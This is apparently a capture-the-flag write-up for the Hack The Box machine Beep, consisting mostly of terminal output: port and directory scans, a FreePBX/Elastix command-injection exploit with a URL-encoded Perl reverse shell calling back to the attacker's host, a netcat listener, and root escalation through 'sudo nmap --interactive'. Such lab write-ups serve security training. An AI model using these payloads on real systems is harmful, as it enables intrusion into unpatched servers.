Write-Up: HTB Beep

kali@kali:~/htb/beep$ nmap -sC -sV 10.10.10.7 -oN beepNmapNmap scan report for 10.10.10.7
Host is up (0.028s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.3
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-
340/tcp filtered unknown
443/tcp open ssl/https?
993/tcp open ssl/imap Cyrus imapd
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
3404/tcp filtered unknown
4445/tcp open upnotifyp?
6668/tcp filtered irc
9081/tcp filtered cisco-aqos
9103/tcp filtered jetdirect
10000/tcp open http MiniServ 1.570 (Webmin httpd)

Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
kali@kali:~/htb/beep$ gobuster dir -u https://10.10.10.7/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt -x php, txt -k
/modules (Status: 301)
/images (Status: 301)
/admin (Status: 301)
/themes (Status: 301)
/register.php (Status: 200)
/help (Status: 301)
/config.php (Status: 200)
/var (Status: 301)
/mail (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/libs (Status: 301)
/index.php (Status: 200)
/panel (Status: 301)
/configs (Status: 301)
/recordings (Status: 301)
/vtigercrm (Status: 301)
kali@kali:~/htb/beep$ searchsploit elastix

Exploit Title
Elastix - 'page' Cross-Site Scripting
Elastix - Multiple Cross-Site Scripting Vulnerabilities
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities
Elastix 2.2.0 - 'graph.php' Local File Inclusion
Elastix 2.x - Blind SQL Injection
Elastix < 2.5 - PHP Code Injection
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution

Shellcodes: No Results
<...>
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)
wget --no-check-certificate "https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.21%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A" -O payload.html
kali@kali:~/htb/beep$ sudo nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.7 51979
id
uid=100(asterisk) gid=101(asterisk)
bash-3.2$ sudo -l
sudo -l
<...>

User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store